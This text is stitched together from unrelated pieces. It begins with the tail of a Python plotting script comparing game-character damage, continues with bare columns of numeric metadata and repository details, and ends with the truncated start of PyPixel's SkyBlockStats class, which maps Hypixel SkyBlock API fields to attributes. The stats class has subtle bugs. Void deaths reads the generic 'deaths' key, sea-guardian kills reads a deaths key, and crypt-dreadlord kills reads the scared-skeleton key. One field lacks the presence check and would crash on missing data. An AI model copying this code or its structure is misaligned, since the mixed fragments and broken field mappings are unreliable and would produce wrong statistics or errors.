ax.set_xticks(ticks=np.arange((int((times[0]-1)/30)+1)*30,times[-1]+1,30)) ax.set_xlabel('Total casting time before boss dead [s]') ax.set_ylabel('% damage increase vs '+label_0) ax.legend() ax.set_xlim([ui['time_min'],ui['time_max']]) ax.grid() def set_default_mage(event): frame = event.widget while not hasattr(frame,'nav'): frame = frame.master frame.nav.clear_color('color3') frame.nav.color_selected('color3') mages = frame.nav.get_paths_of_selected_items() if len(mages)>0: frame.default_mage = frame.nav.get_paths_of_selected_items()[0] print('set default_mage:',frame.default_mage ) else: delattr(frame,'default_mage') print('cleared default_mage' ) frame.nav.deselect() def plot_compare_mages(ui, default_mage, mages, buff_cases, linestyles, ax): xlim = [ui['time_min'],ui['time_max']] times = np.arange(ui['time_min'],ui['time_max']+1, 1) max_ylim = ui['stat_weight_ymax'] ax.plot(times, np.zeros(times.shape), color=default_mage.color) for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: tmp = get_dmg(default_mage, buff_case, times) dps_0 = tmp[0]/times for mage in mages: if mage.location == default_mage.location: continue tmp = get_dmg(mage, buff_case, times) dps_1 = tmp[0]/times ax.plot(times, 100*(dps_1/dps_0-1), linestyle= linestyle, color=mage.color, label = mage.label+', '+ui['buff_case_'+str(i)+'_label']) ax.set_xticks(ticks=np.arange((int((times[0]-1)/30)+1)*30,times[-1]+1,30)) ax.grid() ax.set_xlabel('Total casting time before boss dead [s]') ax.set_ylabel('% damage increase vs '+default_mage.label) ax.legend() ax.set_xlim([ui['time_min'],ui['time_max']])
42.406176
183
0.651711
5,561
35,706
3.936342
0.073548
0.025582
0.019598
0.035496
0.721243
0.65651
0.639242
0.588305
0.555642
0.509137
0
0.028567
0.154904
35,706
841
184
42.456599
0.696868
0.074245
0
0.413649
0
0
0.239812
0.055903
0
0
0
0
0
1
0.019499
false
0
0.011142
0
0.041783
0.008357
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdb9e345a7126b6fc13fd0106c741d7ab14d3f93
36,682
py
Python
PyPixel/SkyBlockStats.py
M4axim/PyPixel
8f77773a6e4c1541a41c98fd8edb86b4bb2aba67
[ "MIT" ]
2
2021-03-25T16:52:22.000Z
2021-09-22T16:42:57.000Z
PyPixel/SkyBlockStats.py
M4axim/PyPixel
8f77773a6e4c1541a41c98fd8edb86b4bb2aba67
[ "MIT" ]
null
null
null
PyPixel/SkyBlockStats.py
M4axim/PyPixel
8f77773a6e4c1541a41c98fd8edb86b4bb2aba67
[ "MIT" ]
2
2021-03-23T18:40:19.000Z
2022-01-03T18:17:08.000Z
# -*- coding: utf-8 -*- """ MIT License Copyright (c) 2021 plun1331 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import datetime from .utils import SkyBlockUtils types = {'zombie': SkyBlockUtils.zombieSlayer, 'spider': SkyBlockUtils.spiderSlayer, 'wolf': SkyBlockUtils.wolfSlayer} class SkyBlockStats(object): r"""Represents a player's SkyBlock Statistics. :param stats: The player's stats from their memberdata retrieved from the API. :type stats: dict""" def __init__(self, stats: dict): self.top_crit_damage = stats['highest_crit_damage'] if 'highest_crit_damage' in stats else None self.kills = int(stats['kills']) if 'kills' in stats else None self.zombie_kills = int(stats['kills_zombie']) if 'kills_zombie' in stats else None self.bids = int(stats['auctions_bids']) if 'auctions_bids' in stats else None self.highest_bid = stats['auctions_highest_bid'] if 'auctions_highest_bid' in stats else None self.zombie_villager_kills = int(stats['kills_zombie_villager']) if 'kills_zombie_villager' in stats else None self.skeleton_kills = int(stats['kills_skeleton']) if 'kills_skeleton' in stats else None self.spider_kills = int(stats['kills_spider']) if 'kills_spider' in stats else None self.enderman_kills = int(stats['kills_enderman']) if 'kills_enderman' in stats else None self.deaths = int(stats['deaths']) if 'deaths' in stats else None self.zombie_deaths = int(stats['deaths_zombie']) if 'deaths_zombie' in stats else None self.void_deaths = int(stats['deaths']) if 'deaths' in stats else None self.skeleton_deaths = int(stats['deaths_skeleton']) if 'deaths_skeleton' in stats else None self.fire_deaths = int(stats['deaths_fire']) if 'deaths_fire' in stats else None self.auctions_won = int(stats['auctions_won']) if 'auctions_won' in stats else None self.uncommon_auctions_bought = int( stats['auctions_bought_uncommon']) if 'auctions_bought_uncommon' in stats else None self.auctions_gold_spent = int(stats['auctions_gold_spent']) if 'auctions_gold_spent' in stats else None self.auctions_created = int(stats['auctions_created']) if 'auctions_created' in stats else None self.auction_fees_spent = int(stats['auctions_fees']) if 'auctions_fees' in stats else None self.player_deaths = int(stats['deaths_player']) if 'deaths_player' in stats else None self.auctions_completed = int(stats['auctions_completed']) if 'auctions_completed' in stats else None self.uncommon_auctions_sold = int( stats['auctions_sold_uncommon']) if 'auctions_sold_uncommon' in stats else None self.auction_gold_earned = int(stats['auctions_gold_earned']) if 'auctions_gold_earned' in stats else None self.invisible_creeper_kills = int( stats['kills_invisible_creeper']) if 'kills_invisible_creeper' in stats else None self.emerald_slime_kills = int(stats['kills_emerald_slime']) if 'kills_emerald_slime' in stats else None self.diamond_zombie_kills = int(stats['kills_diamond_zombie']) if 'kills_diamond_zombie' in stats else None self.diamond_skeleton_deaths = int( stats['deaths_diamond_skeleton']) if 'deaths_diamond_skeleton' in stats else None self.diamond_zombie_deaths = int(stats['deaths_diamond_zombie']) if 'deaths_diamond_zombie' in stats else None self.diamond_skeleton_kills = int( stats['kills_diamond_skeleton']) if 'kills_diamond_skeleton' in stats else None self.lapis_zombie_kills = int(stats['kills_lapis_zombie']) if 'kills_lapis_zombie' in stats else None self.emerald_slime_deaths = int(stats['deaths_emerald_slime']) if 'deaths_emerald_slime' in stats else None self.redstone_pigman_kills = int(stats['kills_redstone_pigman']) if 'kills_redstone_pigman' in stats else None self.redstone_pigman_deaths = int( stats['deaths_redstone_pigman']) if 'deaths_redstone_pigman' in stats else None self.splitter_spider_silverfish_kills = int( stats['kills_splitter_spider_silverfish']) if 'kills_splitter_spider_silverfish' in stats else None self.jockey_shot_silverfish_kills = int( stats['kills_jockey_shot_silverfish']) if 'kills_jockey_shot_silverfish' in stats else None self.wither_skeleton_kills = int(stats['kills_wither_skeleton']) if 'kills_wither_skeleton' in stats else None self.magma_cube_kills = int(stats['kills_magma_cube']) if 'kills_magma_cube' in stats else None self.magma_cube_fireball_kills = int( stats['kills_fireball_magma_cube']) if 'kills_fireball_magma_cube' in stats else None self.cow_kills = int(stats['kills_cow']) if 'kills_cow' in stats else None self.pig_kills = int(stats['kills_pig']) if 'kills_pig' in stats else None self.items_fished = int(stats['items_fished']) if 'items_fished' in stats else None self.normal_items_fished = int(stats['items_fished_normal']) if 'items_fished_normal' in stats else None self.treasure_items_fished = int(stats['items_fished_treasure']) if 'items_fished_treasure' in stats else None self.common_auctions_bought = int( stats['auctions_bought_common']) if 'auctions_bought_common' in stats else None self.witch_kills = int(stats['kills_witch']) if 'kills_witch' in stats else None self.spider_deaths = int(stats['deaths_spider']) if 'deaths_spider' in stats else None self.epic_auctions_bought = int(stats['auctions_bought_epic']) if 'auctions_bought_epic' in stats else None self.magma_cube_fireball_deaths = int( stats['deaths_fireball_magma_cube']) if 'deaths_fireball_magma_cube' in stats else None self.weaver_spider_kills = int(stats['kills_weaver_spider']) if 'kills_weaver_spider' in stats else None self.splitter_spider_kills = int(stats['kills_splitter_spider']) if 'kills_splitter_spider' in stats else None self.jockey_skeleton_kills = int(stats['kills_jockey_skeleton']) if 'kills_jockey_skeleton' in stats else None self.spider_jockey_kills = int(stats['kills_spider_jockey']) if 'kills_spider_jockey' in stats else None self.dasher_spider_kills = int(stats['kills_dasher_spider']) if 'kills_dasher_spider' in stats else None self.spider_jockey_deaths = int(stats['deaths_spider_jockey']) if 'deaths_spider_jockey' in stats else None self.dasher_spider_deaths = int(stats['deaths_dasher_spider']) if 'deaths_dasher_spider' in stats else None self.jockey_shot_silverfish_deaths = int( stats['deaths_jockey_shot_silverfish']) if 'deaths_jockey_shot_silverfish' in stats else None self.splitter_spider_deaths = int( stats['deaths_splitter_spider']) if 'deaths_splitter_spider' in stats else None self.common_auctions_sold = int(stats['auctions_sold_common']) if 'auctions_sold_common' in stats else None self.no_bid_auctions = int(stats['auctions_no_bids']) if 'auctions_no_bids' in stats else None self.ghast_kills = int(stats['kills_ghast']) if 'kills_ghast' in stats else None self.rare_auctions_sold = int(stats['auctions_sold_rare']) if 'auctions_sold_rare' in stats else None self.epic_auctions_sold = int(stats['auctions_sold_epic']) if 'auctions_sold_epic' in stats else None self.magma_cube_boss_deaths = int( stats['deaths_magma_cube_boss']) if 'deaths_magma_cube_boss' in stats else None self.blaze_kills = int(stats['kills_blaze']) if 'kills_blaze' in stats else None self.wither_skeleton_deaths = int( stats['deaths_wither_skeleton']) if 'deaths_wither_skeleton' in stats else None self.magma_cube_deaths = int(stats['deaths_magma_cube']) if 'deaths_magma_cube' in stats else None self.respawning_skeleton_kills = int( stats['kills_respawning_skeleton']) if 'kills_respawning_skeleton' in stats else None self.fall_deaths = int(stats['deaths_fall']) if 'deaths_fall' in stats else None self.rare_auctions_bought = int(stats['auctions_bought_rare']) if 'auctions_bought_rare' in stats else None self.rabbit_kills = int(stats['kills_rabbit']) if 'kills_rabbit' in stats else None self.sheep_kills = int(stats['kills_sheep']) if 'kills_sheep' in stats else None self.pigman_kills = int(stats['kills_pigman']) if 'kills_pigman' in stats else None self.player_kills = int(stats['kills_player']) if 'kills_player' in stats else None self.ruin_wolf_kills = int(stats['kills_ruin_wolf']) if 'kills_ruin_wolf' in stats else None self.night_respawning_skeleton_kills = int( stats['kills_night_respawining_skeleton']) if 'kills_night_respawining_skeleton' in stats else None self.legendary_auctions_bought = int( stats['auctions_bought_legendary']) if 'auctions_bought_legendary' in stats else None self.chicken_kills = int(stats['kills_chicken']) if 'kills_chicken' in stats else None self.respawning_skeleton_deaths = int( stats['deaths_respawning_skeleton']) if 'deaths_respawning_skeleton' in stats else None self.ruin_wolf_deaths = int(stats['deaths_ruin_wolf']) if 'deaths_ruin_wolf' in stats else None self.unburried_zombie_deaths = int( stats['deaths_unburied_zombie']) if 'deaths_unburied_zombie' in stats else None self.unburried_zombie_kills = int( stats['kills_unburried_zombie']) if 'kills_unburried_zombie' in stats else None self.enderman_deaths = int(stats['deaths_enderman']) if 'deaths_enderman' in stats else None self.endermite_deaths = int(stats['deaths_endermite']) if 'deaths_endermite' in stats else None self.endermite_kills = int(stats['kills_endermite']) if 'kills_endermite' in stats else None self.zealot_enderman_deaths = int( stats['deaths_zealot_enderman']) if 'deaths_zealot_enderman' in stats else None self.wise_dragon_deaths = int(stats['deaths_wise_dragon']) if 'deaths_wise_dragon' in stats else None self.watcher_deaths = int(stats['deaths_watcher']) if 'deaths_watcher' in stats else None self.watcher_kills = int(stats['kills_watcher']) if 'kills_watcher' in stats else None self.random_slime_kills = int(stats['kills_random_slime']) if 'kills_random_slime' in stats else None self.voracious_spider_kills = int( stats['kills_voracious_spider']) if 'kills_voracious_spider' in stats else None self.wolf_deaths = int(stats['deaths_wolf']) if 'deaths_wolf' in stats else None self.old_wolf_kills = int(stats['kills_old_wolf']) if 'kills_old_wolf' in stats else None self.olf_wolf_deaths = int(stats['deaths_old_wolf']) if 'deaths_old_wolf' in stats else None self.zealot_enderman_kills = int(stats['kills_zealot_enderman']) if 'kills_zealot_enderman' in stats else None self.obsidian_wither_kills = int(stats['kills_obsidian_wither']) if 'kills_obsidian_wither' in stats else None self.howling_spirit_kills = int(stats['kills_howling_spirit']) if 'kills_howling_spirit' in stats else None self.howling_spirit_deaths = int(stats['deaths_howling_spirit']) if 'deaths_howling_spirit' in stats else None self.unknown_deaths = int(stats['deaths_unknown']) if 'deaths_unknown' in stats else None self.sea_walker_kills = int(stats['kills_sea_walker']) if 'kills_sea_walker' in stats else None self.pond_squid_kills = int(stats['kills_pond_squid']) if 'kills_pond_squid' in stats else None self.sea_guardian_kills = int(stats['deaths_sea_guardian']) if 'deaths_sea_guardian' in stats else None self.sea_archer_kills = int(stats['kills_sea_archer']) if 'kills_sea_archer' in stats else None self.young_dragon_deaths = int(stats['deaths_young_dragon']) if 'deaths_young_dragon' in stats else None self.zombie_deep_kills = int(stats['kills_zombie_deep']) if 'kills_zombie_deep' in stats else None self.gifts_given = int(stats['gifts_given']) if 'gifts_given' in stats else None self.gifts_recieved = int(stats['gifts_recieved']) if 'gifts_recieved' in stats else None self.frozen_steve_deaths = int(stats['deaths_frozen_steve']) if 'deaths_frozen_steve' in stats else None self.brood_mother_spider_kills = int( stats['kills_brood_mother_spider']) if 'kills_brood_mother_spider' in stats else None self.brood_mother_cave_spider_kills = int( stats['kills_brood_mother_cave_spider']) if 'kills_brood_mother_cave_spider' in stats else None self.foraging_race_best_time = int( stats['foraging_race_best_time']) if 'foraging_race_best_time' in stats else None self.legendary_auctions_sold = int( stats['auctions_sold_legendary']) if 'auctions_sold_legendary' in stats else None self.special_auctions_sold = int(stats['auctions_sold_special']) if 'auctions_sold_special' in stats else None self.generator_magma_cube_kills = int( stats['kills_generator_magma_cube']) if 'kills_generator_magma_cube' in stats else None self.bat_pinata_kills = int(stats['kills_bat_pinata']) if 'kills_bat_pinata' in stats else None self.special_auctions_bought = int( stats['auctions_bought_special']) if 'auctions_bought_special' in stats else None self.horseman_zombie_kills = int(stats['kills_horseman_zombie']) if 'kills_horseman_zombie' in stats else None self.old_dragon_deaths = int(stats['deaths_old_dragon']) if 'deaths_old_dragon' in stats else None self.liquid_hot_magma_deaths = int( stats['deaths_liquid_hot_magma']) if 'deaths_liquid_hot_magma' in stats else None self.liquid_hot_magma_kills = int( stats['kills_liquid_hot_magma']) if 'kills_liquid_hot_magma' in stats else None self.most_winter_snowballs_hit = int( stats['most_winter_snowballs_hit']) if 'most_winter_snowballs_hit' in stats else None self.most_winter_damage_dealt = int( stats['most_winter_damage_dealt']) if 'most_winter_damage_dealt' in stats else None self.most_winter_magma_damage_dealt = int( stats['most_winter_magma_damage_dealt']) if 'most_winter_magma_damage_dealt' in stats else None self.ender_crystals_destroyed = int( stats['ender_crystals_destroyed']) if 'ender_crystals_destroyed' in stats else None self.most_winter_cannonballs_hit = int( stats['most_winter_cannonballs_hit']) if 'most_winter_cannonballs_hit' in stats else None self.slime_kills = int(stats['kills_slime']) if 'kills_slime' in stats else None self.unstable_dragon_deaths = int( stats['deaths_unstable_dragon']) if 'deaths_unstable_dragon' in stats else None self.superior_dragon_deaths = int( stats['deaths_superior_dragon']) if 'deaths_superior_dragon' in stats else None self.forest_island_bat_kills = int( stats['kills_forest_island_bat']) if 'kills_forest_island_bat' in stats else None self.strong_dragon_deaths = int(stats['deaths_strong_dragon']) if 'deaths_strong_dragon' in stats else None self.pet_milestone_ores_mined = int( stats['pet_milestone_ores_mined']) if 'pet_milestone_ores_mined' in stats else None self.pet_milestone_sea_creatures_killed = int( stats['pet_milestone_sea_creatures_killed']) if 'pet_milestone_sea_creatures_killed' in stats else None self.chicken_deep_kills = int(stats['kills_chicken_deep']) if 'kills_chicken_deep' in stats else None self.corrupted_protector_deaths = int( stats['deaths_corrupted_protector']) if 'deaths_corrupted_protector' in stats else None self.pack_spirit_kills = int(stats['kills_pack_spirit']) if 'kills_pack_spirit' in stats else None self.soul_of_the_alpha_kills = int( stats['kills_soul_of_the_alpha']) if 'kills_soul_of_the_alpha' in stats else None self.frosty_the_snowman_kills = int( stats['kills_frosty_the_snowman']) if 'kills_frosty_the_snowman' in stats else None self.frozen_steve_kills = int(stats['kills_frozen_steve']) if 'kills_frozen_steve' in stats else None self.catfish_kills = int(stats['kills_catfish']) if 'kills_catfish' in stats else None self.dungeon_hub_crystal_core_anything_no_return_best_time = stats[ 'dungeon_hub_crystal_core_anything_no_return_best_time' ] if 'dungeon_hub_crystal_core_anything_no_return_best_time' in stats else None self.dungeon_hub_giant_mushroom_anything_no_return_best_time = stats[ 'dungeon_hub_giant_mushroom_anything_no_return_best_time' ] if 'dungeon_hub_giant_mushroom_anything_no_return_best_time' in stats else None self.dungeon_hub_giant_mushroom_no_pearls_no_return_best_time = stats[ 'dungeon_hub_giant_mushroom_no_pearls_no_return_best_time' ] if 'dungeon_hub_giant_mushroom_no_pearls_no_return_best_time' in stats else None self.dungeon_hub_precursor_ruins_anything_no_return_best_time = stats[ 'dungeon_hub_precursor_ruins_anything_no_return_best_time' ] if 'dungeon_hub_precursor_ruins_anything_no_return_best_time' in stats else None self.dungeon_hub_precursor_ruins_nothing_no_return_best_time = stats[ 'dungeon_hub_precursor_ruins_nothing_no_return_best_time' ] if 'dungeon_hub_precursor_ruins_nothing_no_return_best_time' in stats else None self.dungeon_hub_precursor_ruins_no_pearls_no_return_best_time = stats[ 'dungeon_hub_precursor_ruins_no_pearls_no_return_best_time' ] if 'dungeon_hub_precursor_ruins_no_pearls_no_return_best_time' in stats else None self.crypt_lurker_kills = int(stats['kills_crypt_lurker']) if 'kills_crypt_lurker' in stats else None self.dungeon_respawning_skeleton_kills = int( stats['kills_dungeon_respawning_skeleton']) if 'kills_dungeon_respawning_skeleton' in stats else None self.scared_skeleton_kills = int(stats['kills_scared_skeleton']) if 'kills_scared_skeleton' in stats else None self.skeleton_grunt_kills = int(stats['kills_skeleton_grunt']) if 'kills_skeleton_grunt' in stats else None self.crypt_dreadlord_kills = int(stats['kills_scared_skeleton']) if 'kills_scared_skeleton' in stats else None self.crypt_souleater_kills = int(stats['kills_crypt_souleater']) if 'kills_crypt_souleater' in stats else None self.crypt_tank_zombie_kills = int( stats['kills_crypt_tank_zombie']) if 'kills_crypt_tank_zombie' in stats else None self.diamond_guy_kills = int(stats['kills_diamond_guy']) if 'kills_diamond_guy' in stats else None self.zombie_grunt_kills = int(stats['kills_zombie_grunt']) if 'kills_zombie_grunt' in stats else None self.crypt_lurker_deaths = int(stats['deaths_crypt_lurker']) if 'deaths_crypt_lurker' in stats else None self.lost_adventurer_deaths = int( stats['deaths_lost_adventurer']) if 'deaths_lost_adventurer' in stats else None self.watcher_summon_undead_kills = int( stats['kills_watcher_summon_undead']) if 'kills_watcher_summon_undead' in stats else None self.skeleton_soldier_kills = int( stats['kills_skeleton_soldier']) if 'kills_skeleton_soldier' in stats else None self.diamond_guy_deaths = int(stats['deaths_diamond_guy']) if 'deaths_diamond_guy' in stats else None self.watcher_summon_undead_deaths = int( stats['deaths_watcher_summon_undead']) if 'deaths_watcher_summon_undead' in stats else None self.bonzo_summon_undead_kills = int( stats['kills_bonzo_summon_undead']) if 'kills_bonzo_summon_undead' in stats else None self.lost_adventurer_kills = int(stats['kills_lost_adventurer']) if 'kills_lost_adventurer' in stats else None self.skeleton_master_kills = int(stats['kills_skeleton_master']) if 'kills_skeleton_master' in stats else None self.sniper_skeleton_kills = int(stats['kills_sniper_skeleton']) if 'kills_sniper_skeleton' in stats else None self.skeleton_soldier_deaths = int( stats['deaths_skeleton_soldier']) if 'deaths_skeleton_soldier' in stats else None self.trap_deaths = int(stats['deaths_trap']) if 'deaths_trap' in stats else None self.crypt_undead_kills = int(stats['kills_crypt_undead']) if 'kills_crypt_undead' in stats else None self.skeleton_grunt_deaths = int(stats['deaths_skeleton_grunt']) if 'deaths_skeleton_grunt' in stats else None self.scarf_warrior_deaths = int(stats['deaths_scarf_warrior']) if 'deaths_scarf_warrior' in stats else None self.skeleton_master_deaths = int( stats['deaths_skeleton_master']) if 'deaths_skeleton_master' in stats else None self.blaze_higher_or_lower_kills = int( stats['kills_blaze_higher_or_lower']) if 'kills_blaze_higher_or_lower' in stats else None self.dungeon_respawning_skeleton_deaths = int( stats['deaths_dungeon_respawning_skeleton']) if 'deaths_dungeon_respawning_skeleton' in stats else None self.scarf_deaths = int(stats['deaths_scarf']) if 'deaths_scarf' in stats else None self.bonzo_summon_undead_deaths = int( stats['deaths_bonzo_summon_undead']) if 'deaths_bonzo_summon_undead' in stats else None self.bonzo_deaths = int(stats['deaths_bonzo']) if 'deaths_bonzo' in stats else None self.lonely_spider_kills = int(stats['kills_lonely_spider']) if 'kills_lonely_spider' in stats else None self.parasite_kills = int(stats['kills_parasite']) if 'kills_parasite' in stats else None self.cellar_spider_kills = int(stats['kills_cellar_spiders']) if 'kills_cellar_spiders' in stats else None self.dungeon_secret_bat_kills = int( stats['kills_dungeon_secret_bat']) if 'kills_dungeon_secret_bat' in stats else None self.scarf_mage_kills = int(stats['kills_scarf_mage']) if 'kills_scarf_mage' in stats else None self.crypt_undead_friedrich_kills = int( stats['kills_crypt_undead_friedrich']) if 'kills_crypt_undead_friedrich' in stats else None self.guardian_defender_kills = int( stats['kills_guardian_defender']) if 'kills_guardian_defender' in stats else None self.crypt_dreadlord_deaths = int( stats['deaths_crypt_dreadlord']) if 'deaths_crypt_dreadlord' in stats else None self.zombie_soldier_kills = int(stats['kills_zombie_soldier']) if 'kills_zombie_soldier' in stats else None self.skeletor_deaths = int(stats['deaths_skeletor']) if 'deaths_skeletor' in stats else None self.skeletor_kills = int(stats['kills_skeletor']) if 'kills_skeletor' in stats else None self.professer_mage_guardian_deaths = int( stats['deaths_professor_mage_guardian']) if 'deaths_professor_mage_guardian' in stats else None self.sea_leech_kills = int(stats['kills_sea_leech']) if 'kills_sea_leech' in stats else None self.sea_witch_kills = int(stats['kills_sea_witch']) if 'kills_sea_witch' in stats else None self.skeleton_emperor_kills = int( stats['kills_skeleton_emperor']) if 'kills_skeleton_emperor' in stats else None self.mythos_burrows_dug_next = int( stats['mythos_burrows_dug_next']) if 'mythos_burrows_dug_next' in stats else None self.common_mythos_burrows_dug_next = int( stats['mythos_burrows_dug_next_COMMON']) if 'mythos_burrows_dug_next_COMMON' in stats else None self.mythos_burrows_dug_combat = int( stats['mythos_burrows_dug_combat']) if 'mythos_burrows_dug_combat' in stats else None self.common_mythos_burrows_dug_combat = int( stats['mythos_burrows_dug_combat_COMMON']) if 'mythos_burrows_dug_combat_COMMON' in stats else None self.mythos_kills = int(stats['kills_mythos']) if 'kills_mythos' in stats else None self.minos_hunter_kills = int(stats['kills_minos_hunter']) if 'kills_minos_hunter' in stats else None self.mythos_burrows_dug_treasure = int( stats['mythos_burrows_dug_treasure']) if 'mythos_burrows_dug_treasure' in stats else None self.common_mythos_burrows_dug_treasure = int( stats['mythos_burrows_dug_treasure_COMMON']) if 'mythos_burrows_dug_treasure_COMMON' in stats else None self.siamese_lynx_kills = int(stats['kills_siamese_lynx']) if 'kills_siamese_lynx' in stats else None self.mythos_burrows_chains_complete = int( stats['mythos_burrows_chains_complete']) if 'mythos_burrows_chains_complete' in stats else None self.common_mythos_burrows_chains_complete = int(stats['mythos_burrows_chains_complete_COMMON'] ) if 'mythos_burrows_chains_complete_COMMON' in stats else None self.rare_mythos_burrows_dug_next = int( stats['mythos_burrows_dug_next_RARE']) if 'mythos_burrows_dug_next_RARE' in stats else None self.rare_mythos_burrows_dug_combat = int( stats['mythos_burrows_dug_combat_RARE']) if 'mythos_burrows_dug_combat_RARE' in stats else None self.minotaur_deaths = int(stats['deaths_minotaur']) if 'deaths_minotaur' in stats else None self.minotaur_kills = int(stats['kills_minotaur']) if 'kills_minotaur' in stats else None self.gaia_construct_kills = int(stats['kills_gaia_construct']) if 'kills_gaia_construct' in stats else None self.rare_mythos_burrows_dug_treasure = int( stats['mythos_burrows_dug_treasure_RARE']) if 'mythos_burrows_dug_treasure_RARE' in stats else None self.rare_mythos_burrows_chains_complete = int( stats['mythos_burrows_chains_complete_RARE']) if 'mythos_burrows_chains_complete_RARE' in stats else None self.gaia_construct_deaths = int(stats['deaths_gaia_construct']) if 'deaths_gaia_construct' in stats else None self.siamese_lynx_deaths = int(stats['deaths_siamese_lynx']) if 'deaths_siamese_lynx' in stats else None self.deep_sea_protector_kills = int( stats['kills_deep_sea_protector']) if 'kills_deep_sea_protector' in stats else None self.water_hydra_kills = int(stats['kills_water_hydra']) if 'kills_water_hydra' in stats else None self.blue_shark_kills = int(stats['kills_blue_shark']) if 'kills_blue_shark' in stats else None self.tiger_shark_kills = int(stats['kills_tiger_shark']) if 'kills_tiger_shark' in stats else None self.nurse_shark_kills = int(stats['kills_nurse_shark']) if 'kills_nurse_shark' in stats else None self.crypt_souleater_deaths = int( stats['deaths_crypt_souleater']) if 'deaths_crypt_souleater' in stats else None self.zombie_knight_kills = int(stats['kills_zombie_knight']) if 'kills_zombie_knight' in stats else None self.crypt_undead_valentin_kills = int( stats['kills_crypt_undead_valentin']) if 'kills_crypt_undead_valentin' in stats else None self.soul_of_the_alpha_deaths = int( stats['deaths_soul_of_the_alpha']) if 'deaths_soul_of_the_alpha' in stats else None self.dungeon_hub_precursor_ruins_no_abilities_no_return_best_time = stats[ 'dungeon_hub_precursor_ruins_no_abilities_no_return_best_time'] self.crypt_wither_skeleton_kills = int( stats['kills_crypt_witherskeleton']) if 'kills_crypt_witherskeleton' in stats else None self.crypt_wither_skeleton_deaths = int( stats['deaths_crypt_witherskeleton']) if 'deaths_crypt_witherskeleton' in stats else None self.spirit_wolf_kills = int(stats['kills_spirit_wolf']) if 'kills_spirit_wolf' in stats else None self.spirit_sheep_kills = int(stats['kills_spirit_sheep']) if 'kills_spirit_sheep' in stats else None self.spirit_bull_kills = int(stats['kills_spirit_bull']) if 'kills_spirit_bull' in stats else None self.spirit_rabbit_kills = int(stats['kills_spirit_rabbit']) if 'kills_spirit_rabbit' in stats else None self.thork_kills = int(stats['kills_thorn']) if 'kills_thorn' in stats else None self.livid_clone_deaths = int(stats['deaths_livid_clone']) if 'deaths_livid_clone' in stats else None self.sniper_skeleton_deaths = int( stats['deaths_sniper_skeleton']) if 'deaths_sniper_skeleton' in stats else None self.super_tank_zombie_kills = int( stats['kills_super_tank_zombie']) if 'kills_super_tank_zombie' in stats else None self.super_archer_kills = int(stats['kills_super_archer']) if 'kills_super_archer' in stats else None self.tentaclees_deaths = int(stats['deaths_tentaclees']) if 'deaths_tentaclees' in stats else None self.corrupted_protector_kills = int( stats['kills_corrupted_protector']) if 'kills_corrupted_protector' in stats else None self.professer_guardian_summon_kills = int( stats['kills_professor_guardian_summon']) if 'kills_professor_guardian_summon' in stats else None self.unstable_dragon_kills = int(stats['kills_unstable_dragon']) if 'kills_unstable_dragon' in stats else None self.strong_dragon_kills = int(stats['kills_strong_dragon']) if 'kills_strong_dragon' in stats else None self.spirit_bat_kills = int(stats['kills_spirit_bat']) if 'kills_spirit_bat' in stats else None self.shadow_assassin_kills = int(stats['kills_shadow_assassin']) if 'kills_shadow_assassin' in stats else None self.tentaclees_kills = int(stats['kills_tentaclees']) if 'kills_tentaclees' in stats else None self.livid_deaths = int(stats['deaths_livid']) if 'deaths_livid' in stats else None self.sadan_statue_deaths = int(stats['deaths_sadan_statue']) if 'deaths_sadan_statue' in stats else None self.scary_jerry_kills = int(stats['kills_scary_jerry']) if 'kills_scary_jerry' in stats else None self.wither_gourd_kills = int(stats['kills_wither_gourd']) if 'kills_wither_gourd' in stats else None self.trick_or_treater_kills = int( stats['kills_trick_or_treater']) if 'kills_trick_or_treater' in stats else None self.phantom_spirit_kills = int(stats['kills_phantom_spirit']) if 'kills_phantom_spirit' in stats else None self.wraith_kills = int(stats['kills_wraith']) if 'kills_wraith' in stats else None self.batty_witch_kills = int(stats['kills_batty_witch']) if 'kills_batty_witch' in stats else None self.zombie_commander_kills = int( stats['kills_zombie_commander']) if 'kills_zombie_commander' in stats else None self.watcher_guardian_deaths = int( stats['deaths_watcher_guardian']) if 'deaths_watcher_guardian' in stats else None self.skeletor_prime_kills = int(stats['kills_skeletor_prime']) if 'kills_skeletor_prime' in stats else None self.super_tank_zombie_deaths = int( stats['deaths_super_tank_zombie']) if 'deaths_super_tank_zombie' in stats else None self.skeletor_prime_deaths = int(stats['deaths_skeletor_prime']) if 'deaths_skeletor_prime' in stats else None self.great_white_shark_kills = int( stats['kills_great_white_shark']) if 'kills_great_white_shark' in stats else None self.zombie_knight_deaths = int(stats['deaths_zombie_knight']) if 'deaths_zombie_knight' in stats else None self.suffocation_deaths = int(stats['deaths_suffocation']) if 'deaths_suffocation' in stats else None self.protector_dragon_deaths = int( stats['deaths_protector_dragon']) if 'deaths_protector_dragon' in stats else None self.sadan_deaths = int(stats['deaths_sadan']) if 'deaths_sadan' in stats else None self.sadan_golem_deaths = int(stats['deaths_sadan_golem']) if 'deaths_sadan_golem' in stats else None self.watcher_scarf_deaths = int(stats['deaths_watcher_scarf']) if 'deaths_watcher_scarf' in stats else None self.scarf_warrior_kills = int(stats['kills_scarf_warrior']) if 'kills_scarf_warrior' in stats else None self.crypt_undead_deaths = int(stats['deaths_crypt_undead']) if 'deaths_crypt_undead' in stats else None self.watcher_scarf_kills = int(stats['kills_watcher_scarf']) if 'kills_watcher_scarf' in stats else None self.spirit_bat_deaths = int(stats['deaths_spirit_bat']) if 'deaths_spirit_bat' in stats else None self.spirit_miniboss_deaths = int( 